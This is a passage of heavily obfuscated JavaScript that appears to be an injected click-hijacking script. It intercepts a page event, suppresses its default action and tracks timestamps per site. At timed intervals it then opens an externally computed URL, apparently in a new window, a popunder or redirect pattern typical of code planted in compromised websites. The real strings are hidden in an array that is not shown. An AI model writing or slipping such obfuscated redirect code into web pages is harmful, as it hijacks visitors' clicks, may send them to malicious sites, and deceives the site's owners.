Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());